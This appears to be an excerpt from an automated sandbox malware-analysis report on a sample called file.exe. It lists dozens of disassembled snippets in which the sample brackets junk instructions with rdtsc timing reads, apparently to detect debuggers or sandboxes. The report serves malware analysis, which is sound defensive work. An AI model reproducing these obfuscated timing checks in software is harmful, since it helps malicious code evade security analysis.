Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C3F29 second address: 7C3F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F51CD041E13h 0x00000012 jmp 00007F51CD041E07h 0x00000017 je 00007F51CD041DF6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C41DF second address: 7C41F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C58Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C41F2 second address: 7C41F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C6E66 second address: 7C6E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e je 00007F51CCC6C594h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F51CCC6C586h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E8C second address: 7C6EA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041E02h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6EA8 second address: 7C6EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C599h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F33 second address: 7C6F81 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F51CD041E09h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D1C09h], eax 0x00000014 push 00000000h 0x00000016 mov di, 2941h 0x0000001a mov dx, 3304h 0x0000001e call 00007F51CD041DF9h 0x00000023 push edi 0x00000024 jc 00007F51CD041DFCh 0x0000002a jnc 00007F51CD041DF6h 0x00000030 pop edi 0x00000031 push eax 0x00000032 push eax 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F81 second address: 7C6FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F51CCC6C595h 0x00000010 push edx 0x00000011 jmp 00007F51CCC6C58Ah 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ebx 0x0000001b jmp 00007F51CCC6C58Dh 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop esi 0x0000002a push edx 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6FCB second address: 7C704C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D1BA2h], eax 0x0000000f push 00000003h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F51CD041DF8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edx, ecx 0x0000002d mov dword ptr [ebp+122D1815h], esi 0x00000033 push 00000000h 0x00000035 jmp 00007F51CD041E02h 0x0000003a push 00000003h 0x0000003c movzx ecx, si 0x0000003f call 00007F51CD041DF9h 0x00000044 push ecx 0x00000045 jmp 00007F51CD041E09h 0x0000004a pop ecx 0x0000004b push eax 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C704C second address: 7C7050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7050 second address: 7C70B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F51CD041E06h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push esi 0x00000017 jng 00007F51CD041DF6h 0x0000001d pop esi 0x0000001e pushad 0x0000001f jl 00007F51CD041DF6h 0x00000025 jmp 00007F51CD041E06h 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7183 second address: 7C71EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C594h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F51CCC6C58Ch 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F51CCC6C58Eh 0x0000001c pop eax 0x0000001d mov dword ptr [ebp+122D30B8h], eax 0x00000023 push 00000003h 0x00000025 mov edx, 18C277F2h 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1AA2h], ebx 0x00000032 push 00000003h 0x00000034 mov esi, ecx 0x00000036 push BE05EFC6h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F51CCC6C58Ah 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C71EB second address: 7C71F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C72B9 second address: 7C72C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C72C0 second address: 7C733B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F51CD041DFEh 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D5614h], ecx 0x00000015 push 00000000h 0x00000017 sbb esi, 4151B13Ah 0x0000001d push 0015D531h 0x00000022 jbe 00007F51CD041DFEh 0x00000028 xor dword ptr [esp], 0015D5B1h 0x0000002f push 00000003h 0x00000031 mov dword ptr [ebp+122D2E8Ah], edx 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D36ECh] 0x0000003f push 00000003h 0x00000041 mov di, si 0x00000044 push 6D9872CDh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007F51CD041E08h 0x00000051 jbe 00007F51CD041DF6h 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8A44 second address: 7D8A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6937 second address: 7E693C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E693C second address: 7E6948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F51CCC6C586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D7D second address: 7E6D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F51CD041DF6h 0x0000000a jmp 00007F51CD041DFDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D96 second address: 7E6DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F51CCC6C590h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6DAF second address: 7E6DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6DB3 second address: 7E6DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6F0E second address: 7E6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6F18 second address: 7E6F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7273 second address: 7E7279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7279 second address: 7E727D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7404 second address: 7E741C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F51CD041DFEh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E741C second address: 7E7420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7420 second address: 7E7436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041DFCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7436 second address: 7E743C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E743C second address: 7E7440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7440 second address: 7E744E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E744E second address: 7E7452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E75BA second address: 7E75C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E786D second address: 7E7873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7873 second address: 7E787F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E79EB second address: 7E79F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E79F3 second address: 7E79F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE917 second address: 7DE926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F51CD041DF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE926 second address: 7DE935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB50D second address: 7BB511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E86CC second address: 7E86FE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F51CCC6C58Ah 0x00000008 jo 00007F51CCC6C59Dh 0x0000000e jmp 00007F51CCC6C595h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB587 second address: 7EB58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBAAA second address: 7EBAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EAC2B second address: 7EAC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBE4C second address: 7EBE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7ECB second address: 7B7ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2EB9 second address: 7F2ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C58Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2ECC second address: 7F2ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA8A second address: 7BEAA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F51CCC6C588h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2387 second address: 7F23A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFCh 0x00000009 pop edi 0x0000000a push ebx 0x0000000b jno 00007F51CD041DF6h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F23A0 second address: 7F23CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F51CCC6C58Eh 0x0000000e pushad 0x0000000f js 00007F51CCC6C586h 0x00000015 jmp 00007F51CCC6C58Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F23CF second address: 7F23D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F27E4 second address: 7F27EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F27EA second address: 7F27FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFBh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2A86 second address: 7F2A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F610C second address: 7F6112 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6112 second address: 7F611C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F51CCC6C586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F62F2 second address: 7F62F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6901 second address: 7F6905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F71B1 second address: 7F71B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7264 second address: 7F7279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C591h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8149 second address: 7F814D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8B58 second address: 7F8B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9EC4 second address: 7F9ECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9ECA second address: 7F9ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9ED0 second address: 7F9ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA9AB second address: 7FA9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBF9C second address: 7FBFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEFEF second address: 7FF01A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F51CCC6C597h 0x0000000f jl 00007F51CCC6C586h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB1AA second address: 7FB1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBC75 second address: 7FBC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB1B0 second address: 7FB1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF554 second address: 7FF5AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F51CCC6C586h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 xor di, 6DE4h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ecx, 13A1A475h 0x0000001e mov dword ptr [ebp+122D1D75h], ecx 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F51CCC6C588h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov bh, D5h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 je 00007F51CCC6C588h 0x0000004c push esi 0x0000004d pop esi 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2A9 second address: 7FD2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2AF second address: 7FD2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2BE second address: 7FD2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801623 second address: 801627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2C2 second address: 7FD2DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801627 second address: 801642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2DF second address: 7FD2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F51CD041E05h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF78C second address: 7FF792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A68 second address: 803A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A6C second address: 803A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BB0 second address: 804BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A70 second address: 803A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804BBB second address: 804BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808A2A second address: 808A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C58Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806D4A second address: 806D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
